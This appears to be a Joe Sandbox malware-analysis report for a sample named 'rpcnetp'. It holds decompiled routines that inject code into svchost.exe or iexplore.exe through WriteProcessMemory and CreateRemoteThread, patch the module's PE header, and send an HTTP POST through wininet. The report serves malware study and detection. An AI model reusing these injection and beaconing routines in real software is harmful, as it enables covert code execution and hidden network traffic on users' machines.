lstrlenA.KERNEL32(?,00000000,?,?,72B22C40,?,?,00000000,?,00000000), ref: 72B227FD
WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,72B22C40,?,?,00000000,?,00000000), ref: 72B2280A
VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,72B22C40,?,?,00000000,?,00000000), ref: 72B22832

Part of subcall function 72B224BC: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000), ref: 72B224E1
Part of subcall function 72B224BC: CloseHandle.KERNEL32(?,?,?,?,72B22C92,?,?,00000000,00000000,00000000,00000000), ref: 72B22523

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: Virtual$AllocCloseCreateFreeHandleMemoryProcessRemoteThreadWritelstrlen
String ID:
API String ID: 4087653319-0
Opcode ID: 39c991d06c0afe38bbd8af911b84375c92ec6c3a377ed9b082cef371d702e021
Instruction ID: 0632e4a538d9950daad9f33b8e47e12d35339e81be77794994d5613153f95a79
Opcode Fuzzy Hash: 39c991d06c0afe38bbd8af911b84375c92ec6c3a377ed9b082cef371d702e021
Instruction Fuzzy Hash: 16018176140384FBE7218A66CC49F9B3FBCEF89B92F215418BA0AE6182D675D900C774

Uniqueness

Uniqueness Score: -1.00%

Function 72B21EDA, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E72B21EDA() {

				StartServiceCtrlDispatcherA(0x72b26090);
				return  *0x72b2601c;
			}

0x72b21edf
0x72b21eea

APIs

StartServiceCtrlDispatcherA.ADVAPI32(72B26090,72B233A1,00000000), ref: 72B21EDF

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: CtrlDispatcherServiceStart
String ID:
API String ID: 3789849863-0
Opcode ID: f36af199deb20c7b046a8390761e8d1e67ab46b849b99dd81197df9eaff492b9
Instruction ID: 1ff4504a1fc5a67fa2b7bbbe65bc285f09ccc0412d46952d551e3b44151ad459
Opcode Fuzzy Hash: f36af199deb20c7b046a8390761e8d1e67ab46b849b99dd81197df9eaff492b9
Instruction Fuzzy Hash: C8A00275551341C75D7196558584F0677D1A748681311594CE45557206C6155441B521

Uniqueness

Uniqueness Score: -1.00%

Function 72B22ADB, Relevance: 21.2, APIs: 14, Instructions: 185
processthreadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E72B22ADB(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t70;
				intOrPtr _t84;
				void* _t117;
				void* _t119;
				struct _STARTUPINFOA _t121;
				void** _t122;
				void* _t125;

				_t119 = __edx;
				_t117 = __ecx;
				_push(0x180);
				_push(0x72b25410);
				E72B24A94(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t125 - 0x1c)) = 0;
				 *((intOrPtr*)(_t125 - 0x3c)) = 0;
				 *((intOrPtr*)(_t125 - 0x24)) =  *((intOrPtr*)( *0x72b26008 + 0x34));
				 *(_t125 - 0x40) = 0;
				 *(_t125 - 4) = 0;
				_t70 = OpenProcess(0x1fffff, 1, GetCurrentProcessId());
				 *(_t125 - 0x38) = _t70;
				if(_t70 == 0) {
					L26:
					 *(_t125 - 4) =  *(_t125 - 4) | 0xffffffff;
					E72B22D0B(0);
					return E72B2159C( *((intOrPtr*)(_t125 - 0x1c)), _t119);
				} else {
					_t121 = 0x44;
					E72B24D2D(_t125 - 0x8c, 0, _t121);
					 *(_t125 - 0x8c) = _t121;
					 *((short*)(_t125 - 0x5c)) = 0;
					 *((intOrPtr*)(_t125 - 0x60)) = 0x181;
					 *(_t125 - 0x4c) =  *(_t125 - 0x38);
					if( *((intOrPtr*)(_t125 - 0x24)) == 0 || E72B22598(_t125 - 0x190, 0x104) == 0) {
						E72B22842(_t125 - 0x190, 1);
					}
					if( *(_t125 + 8) == 0) {
						 *((intOrPtr*)(_t125 - 0x1c)) = CreateProcessA(0, _t125 - 0x190, 0, 0, 1, 4, 0, 0, _t125 - 0x8c, _t125 - 0x34);
					} else {
						_t122 = _t125 + 8;
						 *(_t125 - 0x20) = 0;
						 *(_t125 - 0x44) = 0;
						if(DuplicateTokenEx( *(_t125 + 8), 0x2000000, 0, 0, 1, _t125 - 0x20) != 0) {
							SetTokenInformation( *(_t125 - 0x20), 0xc, _t125 - 0x44, 4);
							_t122 = _t125 - 0x20;
						}
						_push(0);
						_push( *_t122);
						_push(_t125 - 0x40);
						L72B2446E();
						 *((intOrPtr*)(_t125 - 0x1c)) = CreateProcessAsUserA( *_t122, 0, _t125 - 0x190, 0, 0, 1, 0x404,  *(_t125 - 0x40), 0, _t125 - 0x8c, _t125 - 0x34);
						if( *(_t125 - 0x20) != 0) {
							CloseHandle( *(_t125 - 0x20));
						}
					}
					if( *((intOrPtr*)(_t125 - 0x24)) == 0) {
						L13:
						_t84 =  *((intOrPtr*)(_t125 - 0x1c));
						if(_t84 == 0) {
							goto L26;
						}
						if( *((intOrPtr*)(_t125 - 0x24)) == 0) {
							_t84 =  *0x72b260c4;
						}
						WriteProcessMemory( *(_t125 - 0x34), _t84 -  *0x72b260c4 + 0x72b260c8, 0x72b260c8, 0x80, 0);
						if( *((intOrPtr*)(_t125 - 0x24)) == 0) {
							ResumeThread( *(_t125 - 0x30));
							goto L23;
						} else {
							E72B224BC(0x72b260c8,  *(_t125 - 0x34),  *((intOrPtr*)( *0x72b26008 + 0x34)), 0, 0, _t125 - 0x1c, 0);
							if( *((intOrPtr*)(_t125 - 0x1c)) != 0) {
								L23:
								if( *0x72b26038 != 0) {
									E72B22758( *(_t125 - 0x34));
									 *(_t125 - 0x34) = 0;
								} else {
									 *((intOrPtr*)(_t125 - 0x3c)) = CreateThread(0, 0, E72B22758,  *(_t125 - 0x34), 0, _t125 - 0x48);
								}
								goto L26;
							}
							goto L18;
						}
					} else {
						if( *((intOrPtr*)(_t125 - 0x1c)) == 0) {
							L18:
							if( *(_t125 - 0x34) != 0) {
								TerminateProcess( *(_t125 - 0x34), 0);
								CloseHandle( *(_t125 - 0x34));
							}
							if( *(_t125 - 0x30) != 0) {
								CloseHandle( *(_t125 - 0x30));
							}
							goto L26;
						}
						E72B22842(_t125 - 0x190, 0);
						 *((intOrPtr*)(_t125 - 0x1c)) = E72B227D2(_t117, _t125 - 0x190,  *(_t125 - 0x34), 0);
						goto L13;
					}
				}
			}

0x72b22adb
0x72b22adb
0x72b22adb
0x72b22ae0
0x72b22ae5
0x72b22aec
0x72b22aef
0x72b22afa
0x72b22afd
0x72b22b00
0x72b22b13
0x72b22b19
0x72b22b1e
0x72b22cf5
0x72b22cf5
0x72b22cf9
0x72b22d06
0x72b22b24
0x72b22b26
0x72b22b30
0x72b22b35
0x72b22b3d
0x72b22b41
0x72b22b4b
0x72b22b51
0x72b22b70
0x72b22b70
0x72b22b78
0x72b22c16
0x72b22b7a
0x72b22b7a
0x72b22b7d
0x72b22b80
0x72b22b9a
0x72b22ba7
0x72b22bad
0x72b22bad
0x72b22bb0
0x72b22bb1
0x72b22bb6
0x72b22bb7
0x72b22be3
0x72b22be9
0x72b22bee
0x72b22bee
0x72b22be9
0x72b22c1c
0x72b22c43
0x72b22c43
0x72b22c48
0x00000000
0x00000000
0x72b22c51
0x72b22c53
0x72b22c53
0x72b22c70
0x72b22c79
0x72b22cc2
0x00000000
0x72b22c7b
0x72b22c8d
0x72b22c95
0x72b22cc8
0x72b22cce
0x72b22ced
0x72b22cf2
0x72b22cd0
0x72b22ce5
0x72b22ce5
0x00000000
0x72b22cce
0x00000000
0x72b22c95
0x72b22c1e
0x72b22c21
0x72b22c97
0x72b22c9a
0x72b22ca0
0x72b22ca9
0x72b22ca9
0x72b22cb2
0x72b22cb7
0x72b22cb7
0x00000000
0x72b22cb2
0x72b22c2b
0x72b22c40
0x00000000
0x72b22c40
0x72b22c1c

APIs

GetCurrentProcessId.KERNEL32(72B25410,00000180,72B23357), ref: 72B22B03
OpenProcess.KERNEL32(001FFFFF,00000001,00000000), ref: 72B22B13
DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,00000000,?,00000001), ref: 72B22B92
SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004,?,?,?,?,?,?,?,?,?,?,?,?), ref: 72B22BA7
CreateEnvironmentBlock.USERENV(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 72B22BB7
CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000404,?,00000000,?,?,?,?,00000000), ref: 72B22BDD
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000044), ref: 72B22BEE
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?,?,00000001), ref: 72B22C10
WriteProcessMemory.KERNEL32(?,-72B260C4,72B260C8,00000080,00000000), ref: 72B22C70
TerminateProcess.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 72B22CA0

Part of subcall function 72B22598: GetSystemDirectoryA.KERNEL32(?,?), ref: 72B225AF
Part of subcall function 72B22598: lstrcatA.KERNEL32(?,\svchost.exe), ref: 72B225BD

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000044), ref: 72B22CA9
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000), ref: 72B22CB7
ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000044), ref: 72B22CC2
CreateThread.KERNEL32(00000000,00000000,Function_00002758,?,00000000,?), ref: 72B22CDF

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: Process$Create$CloseHandle$ThreadToken$BlockCurrentDirectoryDuplicateEnvironmentInformationMemoryOpenResumeSystemTerminateUserWritelstrcat
String ID:
API String ID: 1678882957-0
Opcode ID: 195c9657127d0ece1b739d2feb9ea30448834e8276fe395f646a0fbd9e09deb8
Instruction ID: f5b20b8953284a8165a29b877f7eeecf3b44c4b9faa719a56fe60fce383bd0f6
Opcode Fuzzy Hash: 195c9657127d0ece1b739d2feb9ea30448834e8276fe395f646a0fbd9e09deb8
Instruction Fuzzy Hash: C961F7B2812228AFDB218F95CD48EDEBBB9FF08742F10445AF60AE2111D7305A45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 72B22842, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 89
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72B22842(long _a4, void _a8) {
				CHAR* _v8;
				char _v268;
				long _t21;
				int _t24;
				int _t25;
				struct HINSTANCE__* _t28;
				signed short _t30;
				CHAR* _t37;
				void* _t40;
				long _t44;
				CHAR* _t46;
				void* _t48;

				_t21 = GetModuleFileNameA( *0x72b260c4,  &_v268, 0x104);
				if(_t21 == 0) {
					return _t21;
				}
				_v8 = "dll";
				if(_a8 != 0) {
					_v8 = "exe";
				}
				_t46 = _a4;
				lstrcpyA(_t46,  &_v268);
				_t24 = lstrlenA(_t46);
				_t9 = _t46 - 3; // -3
				_t37 = _t24 + _t9;
				_t25 = lstrcmpiA(_t37, _v8);
				if(_t25 != 0) {
					lstrcpyA(_t37, _v8);
					_t25 = CopyFileA( &_v268, _t46, 0);
					if(_t25 != 0) {
						_t25 = CreateFileA(_t46, 0xc0000000, 3, 0, 3, 0, 0);
						_t48 = _t25;
						if(_t48 != 0xffffffff) {
							_t28 =  *0x72b260c4;
							_t40 =  *((intOrPtr*)(_t28 + 0x3c)) + _t28;
							_t44 = _t40 - _t28 + 0x16;
							_a4 = _t44;
							if(_a8 != 0) {
								_t30 =  *(_t40 + 0x16) & 0x0000dfff;
							} else {
								_t30 = 0x00002000 |  *(_t40 + 0x16);
							}
							_a8 = _t30;
							SetFilePointer(_t48, _t44, 0, 0);
							WriteFile(_t48,  &_a8, 2,  &_a4, 0);
							_t25 = CloseHandle(_t48);
						}
					}
				}
				return _t25;
			}

0x72b2285d
0x72b22865
0x72b22942
0x72b22942
0x72b2286f
0x72b22876
0x72b22878
0x72b22878
0x72b22888
0x72b22893
0x72b22896
0x72b2289f
0x72b2289f
0x72b228a4
0x72b228ac
0x72b228b6
0x72b228c3
0x72b228cb
0x72b228da
0x72b228e0
0x72b228e5
0x72b228e7
0x72b228ef
0x72b228f5
0x72b228f8
0x72b228fe
0x72b22914
0x72b22900
0x72b22905
0x72b22905
0x72b2291b
0x72b2291f
0x72b22931
0x72b22938
0x72b22938
0x72b228e5
0x72b228cb
0x00000000

APIs

GetModuleFileNameA.KERNEL32(?,00000104), ref: 72B2285D
lstrcpyA.KERNEL32(?,?,?,?,00000001), ref: 72B22893
lstrlenA.KERNEL32(?,?,?,00000001), ref: 72B22896
lstrcmpiA.KERNEL32(-00000003,72B212DC,?,?,00000001), ref: 72B228A4
lstrcpyA.KERNEL32(-00000003,72B212DC,?,?,00000001), ref: 72B228B6
CopyFileA.KERNEL32 ref: 72B228C3
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000001), ref: 72B228DA
SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,?,00000001), ref: 72B2291F
WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000,?,?,00000001), ref: 72B22931
CloseHandle.KERNEL32(00000000,?,?,00000001), ref: 72B22938

Strings

exe, xrefs: 72B22878
dll, xrefs: 72B2286F

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: File$lstrcpy$CloseCopyCreateHandleModuleNamePointerWritelstrcmpilstrlen
String ID: dll$exe
API String ID: 3010676052-2048111982
Opcode ID: 41059c5f0c257f087289713e3c8953f801aa8b4b035a1268cac12f3048a25823
Instruction ID: 39e45ebfadebca685611a7423d435aa536271cb13803ea72af992d0feb52d8ed
Opcode Fuzzy Hash: 41059c5f0c257f087289713e3c8953f801aa8b4b035a1268cac12f3048a25823
Instruction Fuzzy Hash: C331B636500218BBDB209F56CD48FEB3BFCEF85795F118469FA4AE7142E6308545CB60

Uniqueness

Uniqueness Score: -1.00%

Function 72B22598, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 69
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72B22598(CHAR* _a4, int _a8) {
				void* _v8;
				long _v12;
				int _v16;
				void* _t18;
				char* _t32;
				CHAR* _t34;

				_t32 = 0;
				if( *0x72b26038 != 0) {
					_t34 = _a4;
					while(1) {
						lstrcpyA(_t34, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\iexplore.exe");
						if(_t32 != 0) {
							_t34[0x29] = 0;
						}
						if(RegOpenKeyA(0x80000002, _t34,  &_v8) != 0) {
							goto L10;
						}
						_v16 = _a8;
						RegQueryValueExA(_v8, _t32, 0,  &_v12, _t34,  &_v16);
						RegCloseKey(_v8);
						if(_t32 != 0) {
							lstrcatA(_t34, "\\Internet Explorer\\iexplore.exe");
						}
						if(GetBinaryTypeA(_t34,  &_v12) != 0 && _v12 == 0) {
							_t18 = 1;
							L14:
							return _t18;
						}
						L10:
						if(_t32 != 0) {
							_t18 = 0;
							goto L14;
						}
						_t32 = "ProgramFilesDir";
					}
				}
				GetSystemDirectoryA(_a4, _a8);
				lstrcatA(_a4, "\\svchost.exe");
				return 1;
			}

0x72b2259f
0x72b225a7
0x72b225cc
0x72b225cf
0x72b225d5
0x72b225dd
0x72b225df
0x72b225df
0x72b225f5
0x00000000
0x00000000
0x72b225fa
0x72b2260c
0x72b22615
0x72b2261d
0x72b22625
0x72b22625
0x72b22638
0x72b2264d
0x72b22652
0x00000000
0x72b22652
0x72b22640
0x72b22642
0x72b22650
0x00000000
0x72b22650
0x72b22644
0x72b22644
0x72b225cf
0x72b225af
0x72b225bd
0x00000000

APIs

GetSystemDirectoryA.KERNEL32(?,?), ref: 72B225AF
lstrcatA.KERNEL32(?,\svchost.exe), ref: 72B225BD
lstrcpyA.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe,00000000,00000044), ref: 72B225D5
RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 72B225ED
RegQueryValueExA.ADVAPI32(?,ProgramFilesDir,00000000,?,?,?), ref: 72B2260C
RegCloseKey.ADVAPI32(?), ref: 72B22615
lstrcatA.KERNEL32(?,\Internet Explorer\iexplore.exe), ref: 72B22625
GetBinaryTypeA.KERNEL32(?,?), ref: 72B22630

Strings

\svchost.exe, xrefs: 72B225B5
\Internet Explorer\iexplore.exe, xrefs: 72B2261F
Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe, xrefs: 72B225CF
ProgramFilesDir, xrefs: 72B22608, 72B22644

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: lstrcat$BinaryCloseDirectoryOpenQuerySystemTypeValuelstrcpy
String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe$\Internet Explorer\iexplore.exe$\svchost.exe
API String ID: 2611574897-1971102070
Opcode ID: 5c6572f8ddf3471d1757c32e47d8a8e638a347b27da69d638de365546d842f4c
Instruction ID: aa450610dbcd0adc5716e67513ca5fe787850a5d435588086c1ad627bace7870
Opcode Fuzzy Hash: 5c6572f8ddf3471d1757c32e47d8a8e638a347b27da69d638de365546d842f4c
Instruction Fuzzy Hash: 2C218E37560344BBDB129E69CC08BDB7BFDEF84286F214529F94AE6006E7308A51CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A12598, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 69
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A12598(CHAR* _a4, int _a8) {
				void* _v8;
				long _v12;
				int _v16;
				void* _t18;
				char* _t32;
				CHAR* _t34;

				_t32 = 0;
				if( *0xa16038 != 0) {
					_t34 = _a4;
					while(1) {
						lstrcpyA(_t34, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\iexplore.exe");
						if(_t32 != 0) {
							_t34[0x29] = 0;
						}
						if(RegOpenKeyA(0x80000002, _t34,  &_v8) != 0) {
							goto L10;
						}
						_v16 = _a8;
						RegQueryValueExA(_v8, _t32, 0,  &_v12, _t34,  &_v16);
						RegCloseKey(_v8);
						if(_t32 != 0) {
							lstrcatA(_t34, "\\Internet Explorer\\iexplore.exe");
						}
						if(GetBinaryTypeA(_t34,  &_v12) != 0 && _v12 == 0) {
							_t18 = 1;
							L14:
							return _t18;
						}
						L10:
						if(_t32 != 0) {
							_t18 = 0;
							goto L14;
						}
						_t32 = "ProgramFilesDir";
					}
				}
				GetSystemDirectoryA(_a4, _a8);
				lstrcatA(_a4, "\\svchost.exe");
				return 1;
			}

0x00a1259f
0x00a125a7
0x00a125cc
0x00a125cf
0x00a125d5
0x00a125dd
0x00a125df
0x00a125df
0x00a125f5
0x00000000
0x00000000
0x00a125fa
0x00a1260c
0x00a12615
0x00a1261d
0x00a12625
0x00a12625
0x00a12638
0x00a1264d
0x00a12652
0x00000000
0x00a12652
0x00a12640
0x00a12642
0x00a12650
0x00000000
0x00a12650
0x00a12644
0x00a12644
0x00a125cf
0x00a125af
0x00a125bd
0x00000000

APIs

GetSystemDirectoryA.KERNEL32(?,?), ref: 00A125AF
lstrcatA.KERNEL32(?,\svchost.exe), ref: 00A125BD
lstrcpyA.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe), ref: 00A125D5
RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00A125ED
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00A1260C
RegCloseKey.ADVAPI32(?), ref: 00A12615
lstrcatA.KERNEL32(?,\Internet Explorer\iexplore.exe), ref: 00A12625
GetBinaryTypeA.KERNEL32(?,?), ref: 00A12630

Strings

\svchost.exe, xrefs: 00A125B5
\Internet Explorer\iexplore.exe, xrefs: 00A1261F
Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe, xrefs: 00A125CF
ProgramFilesDir, xrefs: 00A12644

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: lstrcat$BinaryCloseDirectoryOpenQuerySystemTypeValuelstrcpy
String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe$\Internet Explorer\iexplore.exe$\svchost.exe
API String ID: 2611574897-1971102070
Opcode ID: d9af8ec1adc1461aa0637ab33f50f143369798456ef589447eccc0f754a32c8a
Instruction ID: 49be7993c675de2a0bf383a7d8a0e0d9f36eee42b8b10c87fb1d541596da52c3
Opcode Fuzzy Hash: d9af8ec1adc1461aa0637ab33f50f143369798456ef589447eccc0f754a32c8a
Instruction Fuzzy Hash: 8D215C36A00144BBDB11DFA0DD48BEA7BBDEF48795F108025FA16D2060E730CAA6DB65

Uniqueness

Uniqueness Score: -1.00%

Function 72B22D7F, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 113
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E72B22D7F(_Unknown_base(*)()** _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v44;
				signed int _t31;
				_Unknown_base(*)()* _t33;
				signed int _t35;
				signed int _t36;
				intOrPtr* _t37;
				signed int _t44;
				void* _t52;
				signed int* _t55;

				_v8 = 0x4e20;
				_v12 = 0x493e0;
				_t31 = LoadLibraryA("wininet.dll");
				_t55 = _a4;
				_t55[0xd] = _t31;
				if(_t31 != 0) {
					_t5 =  &(_t55[3]); // 0x493ec
					_a4 = _t5;
					_t52 = 0;
					while(1) {
						_t7 = _t52 + 0x72b21574; // 0x72b21324
						_t33 = GetProcAddress(_t55[0xd],  *_t7);
						 *_a4 = _t33;
						if(_t33 == 0) {
							break;
						}
						_a4 =  &(_a4[1]);
						_t52 = _t52 + 4;
						if(_t52 < 0x28) {
							continue;
						}
						_t36 = _t55[3]("Mozilla/4.0 (compatible; MSIE 7.0;)", 0, 0, 0, 0);
						 *_t55 = _t36;
						if(_t36 == 0) {
							L12:
							_t35 = _t36 | 0xffffffff;
							L14:
							return _t35;
						}
						if(_a16 != 0) {
							_t37 = _a12;
							_push( *_t37);
							L72B22946();
						} else {
							_t37 = _a8;
						}
						_t36 = _t55[4]( *_t55, _t37, 0x50, 0x72b211c4, 0x72b211c4, 3, 0, 0);
						_t55[1] = _t36;
						if(_t36 != 0) {
							_t36 = _t55[9](_t36, "POST", 0x72b211c4, 0, 0, 0, 0x84400100, 0);
							_t55[2] = _t36;
							if(_t36 != 0) {
								_t55[5](_t36, 2,  &_v8, 4);
								_t55[5](_t55[2], 5,  &_v12, 4);
								wsprintfA( &_v44, "%s: 0\r\n", "TagId");
								_t44 = _t55[7](_t55[2],  &_v44, 0xffffffff, 0, 0);
								asm("sbb eax, eax");
								_t35 = ( ~_t44 & 0x00000002) - 1;
								goto L14;
							}
						}
						goto L12;
					}
					FreeLibrary(_t55[0xd]);
					_t55[0xd] = 0;
					_t35 = 0;
					goto L14;
				}
				return _t31 | 0xffffffff;
			}

0x72b22d8c
0x72b22d93
0x72b22d9a
0x72b22da0
0x72b22da5
0x72b22daa
0x72b22db4
0x72b22db8
0x72b22dbb
0x72b22dbd
0x72b22dbd
0x72b22dc6
0x72b22dcf
0x72b22dd3
0x00000000
0x00000000
0x72b22dd5
0x72b22dd9
0x72b22ddf
0x00000000
0x00000000
0x72b22dea
0x72b22ded
0x72b22df1
0x72b22e4e
0x72b22e4e
0x72b22e9a
0x00000000
0x72b22e9a
0x72b22df6
0x72b22e10
0x72b22e13
0x72b22e15
0x72b22df8
0x72b22df8
0x72b22df8
0x72b22e2a
0x72b22e2d
0x72b22e32
0x72b22e44
0x72b22e47
0x72b22e4c
0x72b22e5c
0x72b22e6a
0x72b22e7b
0x72b22e8f
0x72b22e94
0x72b22e99
0x00000000
0x72b22e99
0x72b22e4c
0x00000000
0x72b22e32
0x72b22e00
0x72b22e06
0x72b22e09
0x00000000
0x72b22e09
0x00000000

APIs

LoadLibraryA.KERNEL32(wininet.dll), ref: 72B22D9A
GetProcAddress.KERNEL32(?,72B21324), ref: 72B22DC6

Strings

Mozilla/4.0 (compatible; MSIE 7.0;), xrefs: 72B22DE5
wininet.dll, xrefs: 72B22D87
TagId, xrefs: 72B22E6D
%s: 0, xrefs: 72B22E75
POST, xrefs: 72B22E3E
N, xrefs: 72B22D8C

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: N$%s: 0$Mozilla/4.0 (compatible; MSIE 7.0;)$POST$TagId$wininet.dll
API String ID: 2574300362-1135021940
Opcode ID: c91c1c860592b3f528578ac02ed5a4cb714e6664f223f3aca85c5e4039d8444c
Instruction ID: a2a5ce718f49d85c2f3b8665ac83783b69dbef2134b55f7e38b1c01db8571e2a
Opcode Fuzzy Hash: c91c1c860592b3f528578ac02ed5a4cb714e6664f223f3aca85c5e4039d8444c
Instruction Fuzzy Hash: 9B31C2B1500308BFEB21AF64CD89E5B7BFDFF48396B104929F65AD6590D330A854CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00A12D7F, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 113
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00A12D7F(_Unknown_base(*)()** _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v44;
				signed int _t31;
				_Unknown_base(*)()* _t33;
				signed int _t35;
				signed int _t36;
				intOrPtr* _t37;
				signed int _t44;
				void* _t52;
				signed int* _t55;

				_v8 = 0x4e20;
				_v12 = 0x493e0;
				_t31 = LoadLibraryA("wininet.dll");
				_t55 = _a4;
				_t55[0xd] = _t31;
				if(_t31 != 0) {
					_t5 =  &(_t55[3]); // 0x493ec
					_a4 = _t5;
					_t52 = 0;
					while(1) {
						_t7 = _t52 + 0xa11574; // 0xa11324
						_t33 = GetProcAddress(_t55[0xd],  *_t7);
						 *_a4 = _t33;
						if(_t33 == 0) {
							break;
						}
						_a4 =  &(_a4[1]);
						_t52 = _t52 + 4;
						if(_t52 < 0x28) {
							continue;
						}
						_t36 = _t55[3]("Mozilla/4.0 (compatible; MSIE 7.0;)", 0, 0, 0, 0);
						 *_t55 = _t36;
						if(_t36 == 0) {
							L12:
							_t35 = _t36 | 0xffffffff;
							L14:
							return _t35;
						}
						if(_a16 != 0) {
							_t37 = _a12;
							_push( *_t37);
							L00A12946();
						} else {
							_t37 = _a8;
						}
						_t36 = _t55[4]( *_t55, _t37, 0x50, 0xa111c4, 0xa111c4, 3, 0, 0);
						_t55[1] = _t36;
						if(_t36 != 0) {
							_t36 = _t55[9](_t36, "POST", 0xa111c4, 0, 0, 0, 0x84400100, 0);
							_t55[2] = _t36;
							if(_t36 != 0) {
								_t55[5](_t36, 2,  &_v8, 4);
								_t55[5](_t55[2], 5,  &_v12, 4);
